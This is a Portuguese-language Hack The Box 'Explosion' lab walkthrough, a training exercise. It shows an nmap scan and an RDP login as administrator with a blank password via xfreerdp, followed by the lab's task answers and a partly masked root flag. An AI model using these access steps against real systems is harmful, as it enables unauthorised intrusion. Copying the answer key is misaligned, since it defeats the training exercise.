Hack The Box – Starting point – Explosion – TIER 0 Machines

Fala Rapaziada, beleza?

Hoje vou trazer a resolução do Laboratório Explosion do Starting point do HTB.

Capture to Flag

Primeiro, rodei o nmap para descobrir as portas abertas. Diversas portas estão abertas, o foco desse Lab é a porta 3389 do protocolo RDP

nmap -sSV -p- -Pn 10.129.176.127 --min-rate=1000 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 09:11 EST 
Nmap scan report for 10.129.23.134 
Host is up (0.19s latency). 
Not shown: 65521 closed tcp ports (reset) 
PORT      STATE SERVICE       VERSION 
135/tcp   open  msrpc         Microsoft Windows RPC 
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn 
445/tcp   open  microsoft-ds? 
3389/tcp  open  ms-wbt-server Microsoft Terminal Services 
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
49664/tcp open  msrpc         Microsoft Windows RPC 
49665/tcp open  msrpc         Microsoft Windows RPC 
49666/tcp open  msrpc         Microsoft Windows RPC 
49667/tcp open  msrpc         Microsoft Windows RPC 
49668/tcp open  msrpc         Microsoft Windows RPC 
49669/tcp open  msrpc         Microsoft Windows RPC 
49670/tcp open  msrpc         Microsoft Windows RPC 
49671/tcp open  msrpc         Microsoft Windows RPC 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Foi possível realizar o acesso via RDP com a credencial:
Usuário: administrator
Senha: (Em branco)

xfreerdp /v:10.129.176.127 /u:administrator

Após o acesso, capturada a flag.

Tarefas

TASK 1 – What does the 3-letter acronym RDP stand for?
R: Remote Desktop Protocol

TASK 2 – What is a 3-letter acronym that refers to interaction with the host through a command line interface?
R: CLI

TASK 3 – What about graphical user interface interactions?
R: GUI

TASK 4 – What is the name of an old remote access tool that came without encryption by default and listens on TCP port 23?
R: telnet

TASK 5 – What is the name of the service running on port 3389 TCP?
R: ms-wbt-server

TASK 6 – What is the switch used to specify the target host’s IP address when using xfreerdp?
R: /v:

TASK 7 – What username successfully returns a desktop projection to us with a blank password?
R: administrator

SUBMIT FLAG – Submit root flag
R: 951fa96d7830c451XXXXXXXXXXX